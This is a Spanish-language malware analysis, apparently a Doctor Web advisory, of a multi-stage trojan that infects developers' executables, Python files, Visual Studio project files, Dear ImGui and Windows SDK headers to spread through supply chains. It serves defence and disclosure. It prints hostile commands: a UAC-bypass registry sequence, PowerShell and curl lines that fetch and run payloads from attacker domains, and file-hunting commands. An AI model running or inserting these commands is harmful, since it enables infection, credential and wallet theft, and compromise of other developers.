Objetivo: desarrolladores. Un nuevo troyano ataca la cadena de suministro y provoca daños combinados en los equipos infectados
Últimas noticias | Todas las noticias | Sobre los virus
Los primeros casos de propagación del troyano se detectaron durante el último trimestre de 2025 y, desde entonces, sus desarrolladores lo han modificado de forma continua. Se propaga principalmente por Internet mediante archivos .exe y Python infectados. El proceso de infección consta de varias etapas. A continuación, analizamos cada una de ellas y su finalidad.
Etapa 1. Trojan.DownLoader49.35384
Los expertos de Doctor Web detectaron múltiples aplicaciones legítimas infectadas con una estructura similar. Al archivo ejecutable original se le añade un objeto global y la ejecución de la aplicación troyanizada comienza obteniendo acceso a las API del sistema mediante el método PEB walking. A continuación, la función estándar initterm recorre la tabla de punteros a funciones e inicializa cada una de ellas. Una de esas funciones es maliciosa y ejecuta un comando de PowerShell. En algunas versiones del troyano, esta carga útil se almacena cifrada.
Ejecución mediante initterm
El comando de PowerShell descarga y ejecuta el archivo malicioso Trojan.DownLoader49.35687, lo que da comienzo a la segunda etapa de la infección.
Comando malicioso de PowerShell
Además de los archivos ejecutables, se detectaron archivos escritos en Python (Python.Downloader.255). En ellos, el mismo código malicioso estaba cifrado mediante el mecanismo de cifrado simétrico Fernet. El código se oculta mediante una sencilla técnica de ofuscación consistente en insertar una gran cantidad de espacios en la primera línea del archivo. En este caso, la ejecución también se desarrolla en varias etapas.
Archivos maliciosos en Python
Etapa 2. Trojan.DownLoader49.35687
En esta etapa, el troyano Trojan.DownLoader49.35687 comprueba si se está ejecutando en un entorno sandbox. Además, crea un objeto de sincronización mutex con el nombre Global\PFNMX (valor fijo). Un ejemplo de este tipo de objeto es: \Sessions\1\BaseNamedObjects\Global\PFNMX_0o6u9MMc2QdKvqeHmgPRE008. De este modo, el troyano verifica si ya existe otra copia en ejecución en el equipo.
Durante esta segunda etapa, el troyano intenta obtener las direcciones del servidor C2 a través de repositorios públicos de GitHub y de la plataforma de videojuegos Steam. En ellos, los atacantes publican los dominios que el troyano lee y utiliza como URL para descargar la tercera etapa de la infección: el troyano BackDoor.Siggen2.5906.
Las cuentas de Steam creadas por los atacantes contienen el nombre del dominio en texto plano.
Cuenta de Steam con el dominio
En GitHub, los atacantes almacenaron la dirección cifrada del dominio C2 en un archivo raw: raw[.]githubusercontent[.]com/XxXloverXxX/rustflare/refs/heads/main/crates/engine. El troyano descarga este archivo y lo descifra primero mediante Base64 y, posteriormente, aplicando una operación XOR con la clave ZwFlushKey.
Dominios cifrados
Tras descargar la siguiente etapa, Trojan.DownLoader49.35687 la inyecta en el proceso de uno de los 41 archivos ejecutables predefinidos ubicados en C:\Windows\System32.
La dirección del dominio C2 con la que se ha logrado establecer conexión se añade a las cadenas integradas de forma fija en el código del troyano y se transmite a la siguiente etapa a través del canal con nombre pipe\VccFramework.
Etapa 3. BackDoor.Siggen2.5906
En esta etapa se lleva a cabo la actividad maliciosa principal. BackDoor.Siggen2.5906 crea un objeto de sincronización mutex con un nombre fijo del tipo Global\PFNX_Side(valor fijo). A continuación, a través del canal creado previamente, el troyano recibe los datos de la segunda etapa, de los que extrae los identificadores del troyano y el dominio C2 con el que se comunicará BackDoor.Siggen2.5906.
Para consolidarse en el sistema, el troyano descarga el archivo «bungee.boo» que realiza las funciones de la etapa 2 — Trojan.DownLoader49.35687, y suplanta con el mismo los archivos DLL:
- «profapi.dll» de la aplicación Discord,
- «domain_actions.dll» en la carpeta «Domain Actions» y «well_known_domains.dll» en la carpeta «Well Known Domains» de la aplicación Microsoft Edge,
- «C:\Windows\omadmapi.dll».
Además, BackDoor.Siggen2.5906 puede modificar el Registro de Windows para que, al abrir archivos comprimidos con WinRAR, se ejecute código malicioso.
Para ejecutar acciones con privilegios de administrador, el troyano utiliza una técnica para esquivar el UAC (Control de cuentas de usuario). El malware genera un archivo .vbs con un nombre formado por una secuencia aleatoria de cifras, en el que inserta un comando que se ejecutará con privilegios de administrador. A continuación, ejecuta los siguientes comandos mediante cmd.exe:
reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f
reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /ve /t REG_SZ /d "wscript.exe
%APPDATA%\Microsoft\369059.vbs" /f
reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /v DelegateExecute /t REG_SZ /d "" /f
c start /B ComputerDefaults.exe
A continuación, el troyano pone en funcionamiento cinco funciones maliciosas: un stealer, un clipper, un backdoor, un miner y un módulo de infección de archivos.
Stealer
El troyano puede robar información de varios tipos:
- tockens Discord que permiten iniciar sesión en cuentas ajenas sin introducir un nombre de usuario/contraseña;
- contraseñas y cookies de navegadores Chrome, Edge, Opera, Brave, Yandex etc. Además de las técnicas ordinarias de extracción de datos, puede usar el archivo CCCWF.tmp (Trojan.PWS.Siggen5.33623). El mismo se incrusta en el navegador y luego lee las contraseñas y las guarda en archivos de texto;
- carpetas de Telegram Desktop;
- carpetas del criptomonedero Exodus.
Además de robar las carpetas de Exodus, el troyano modifica el monedero de criptomonedas. Para ello, localiza el archivo app.asar y lo suplanta por una copia descargada desde la URL balista[.]lol/Stb/PokerFace/RTApp[.]txt mediante curl. En la versión suplantada el archivo index.js (Trojan.Siggen32.44702) contiene la función unlock() que, al ejecutarse, envía las frases mnemotécnicas del monedero al servidor de los atacantes.
Archivo suplantado index.js
Clipper
Se trata de una de las funciones más peligrosas del troyano. El malware supervisa de forma continua el portapapeles del usuario: busca datos de tarjetas bancarias y los envía al servidor de los atacantes. Además, sustituye las direcciones de los monederos de criptomonedas por otras fraudulentas, que obtiene del servidor C2.
Backdoor
La funcionalidad del troyano permite a los atacantes controlar de forma remota el equipo infectado mediante la ejecución de los siguientes comandos:
| exc | descargar un archivo de url mediante curl y ejecutarlo |
| RVRS | iniciar Reverse Proxy |
| RUNCMD | Ejecutar un comando mediante cmd |
| GETFILE | Cargar el contenido de un archivo determinado al servidor de control |
| LISTDIR | Enviar una lista de archivos desde un directorio específico del equipo al servidor de control |
| TROLL | ejecutar un comando destinado a trolear al usuario. Entre las opciones disponibles se incluyen earrape, scary_sound, rickroll, mute_audio, jumpscare_screamer etc. |
Miner
Mediante curl el troyano descarga desde el servidor y ejecuta el archivo https://files[.]catbox[.]moe/lvh9j3[.]bin — Trojan.Packed2.50953. Su estructura y funcionamiento son similares a los de la segunda etapa, con la diferencia de que, en lugar de descargar e inyectar BackDoor.Siggen2.5906 descarga e inyecta Trojan.BtcMine.3956. Este miner solo se ejecuta tras un determinado periodo de inactividad del usuario. El malware utiliza las herramientas de código fuente abierto XMRig, T-Rex y TeamRedMiner.
Infección de archivos
La principal característica de este troyano es la infección de archivos y su posterior propagación autónoma. Lista de archivos infectados:
- imgui_impl_win32.cpp,
- .suo,
- .exe,
- winnetwk.h (Windows SDK),
- .vcxproj y .csproj.
Para identificar las rutas de los archivos que pueden infectarse, el troyano recorre las unidades de disco y ejecuta el siguiente comando. A continuación, se muestra un ejemplo para la unidad A://
dir /a /s /b A:\*imgui_impl_win32.cpp A:\*.suo A:\*.exe A:\*.vcxproj A:\*.csproj > %ALLUSERSPROFILE%\ADat.bin3290.Los atacantes confían en que los desarrolladores publiquen sus proyectos con código malicioso en repositorios públicos. De este modo, otros desarrolladores que compilen, generen o modifiquen esos proyectos infectarán automáticamente sus equipos a través de los archivos .suo, .vcxproj y .csproj, mientras que los usuarios finales podrán ejecutar archivos ejecutables infectados generados con herramientas de desarrollo comprometidas.
Archivo imgui_impl_win32.cpp. Trojan.Loader.3129
El archivo imgui_impl_win32.cpp — forma parte de la biblioteca conocida Dear ImGui y se encarga de la interfaz gráfica de usuario para aplicaciones desarrolladas en C++. El troyano inserta dos líneas de código en este archivo: la primera contiene la carga útil y la segunda la ejecuta.
Una línea de código con carga útil
Una idea de código que ejecuta la carga útil
Resultado — un comando
start /min cmd.exe /c powershell -WindowStyle Hidden -Command "& { iwr -Uri 'https://exo-api[.]tf/Stb/Retev.php?bl=1BRn03AWabt6xvxWdzDSW01.txt' -OutFile $env:APPDATA\BK879002.exe; Start-Process -FilePath $env:APPDATA\BK879002.exe -WindowStyle Hidden }"
De este modo, la biblioteca queda infectada y cualquier aplicación en C++ creada por el usuario contendrá código malicioso. Al propagar o subir este tipo de aplicaciones, la infección continuará propagándose.
Archivos .suo. Trojan.Loader.3138
Se trata de archivos utilizados por el entorno de desarrollo Microsoft Visual Studio, en los que se almacena la configuración del usuario para determinados proyectos. El troyano sustituye el archivo original por una versión infectada descargada desde el servidor C2.
Un archivo infectado
Como resultado, al abrir un proyecto en Visual Studio se ejecuta el código malicioso:
javascript:new ActiveXObject('WScript.Shell').Run('cmd /b /c curl -o \"C:\\ProgramData\\S47LY.exe\" \"https://pee-files[.]nl/Stb/Retev.php?bl=1BRn03AWabt6xvxWdzDSW01.txt\" && start \"\" \"C:\\ProgramData\\S47LY.exe\"', 0, false);close();
Archivos winnetwk.h. Trojan.Loader.3184
Windows SDK es el kit oficial de desarrollo de software (SDK) de Microsoft, que permite crear aplicaciones para el sistema operativo Windows.
El troyano consulta el Registro de Windows para localizar la carpeta donde está instalado Windows SDK. A continuación, busca el archivo winnetwk.h, responsable de la administración de los recursos de red, e inserta en él código malicioso.
Archivo infectado winnetwk.h
A partir de ese momento, todos los programas creados utilizando winnetwk.h incorporarán código malicioso que ejecutará la segunda etapa.
Archivos .exe
El troyano busca archivos .exe adecuados e inserta en ellos las funciones de inicialización de las API y de ejecución de initterm. A continuación, el archivo empieza a funcionar como Trojan.DownLoader49.35384, es decir, como la etapa 1.
Archivos .vcxproj (Trojan.Loader.3128, Trojan.Loader.3127) y .csproj (Trojan.Loader.3126)
Se trata de archivos de proyecto de Visual Studio para los lenguajes de programación C++ y C#. El troyano añade a estos archivos un comando PreBuildEvent, que se ejecuta antes de cada compilación del proyecto. Las primeras versiones del troyano incorporaban un código similar al de etapa 1.
Versión inicial del código
En las versiones más recientes, el código es más complejo e incorpora mecanismos adicionales de ofuscación.
Nueva versión del código
Una etapa de ejecución de Trojan.Loader.3128
Como resultado de la ejecución del comando malicioso, se crea un archivo .vbs malicioso que, a su vez, ejecuta la carga útil de PowerShell. A continuación, el troyano envía solicitudes a las siguientes direcciones URL:
- youtu.be/akoxddx6lgc,
- steamcommunity.com/profiles/76561198737324192.
En estas direcciones se almacena otra dirección URL cifrada mediante base64.
Una cuenta de YouTube con una dirección URL cifrada
Tras descifrarla, el troyano obtiene el dominio C2 al que se conecta para descargar una carga útil similar a la de la segunda etapa.
El análisis del funcionamiento del troyano permite concluir que se trata de una amenaza especialmente peligrosa, ya que combina múltiples funciones maliciosas. Para evitar la infección del equipo y frenar la propagación del troyano, recomendamos mantener las bases de datos del antivirus siempre actualizadas y analizar todos los archivos descargados de Internet. Los usuarios de Dr.Web Security Space y Dr.Web Desktop Security Suite pueden estar tranquilos, ya que los antivirus Dr.Web detectan y eliminan el troyano de forma segura. Asimismo, los archivos de tipo .vcxproj, .csproj e imgui se desinfectan, eliminándose de ellos el código malicioso.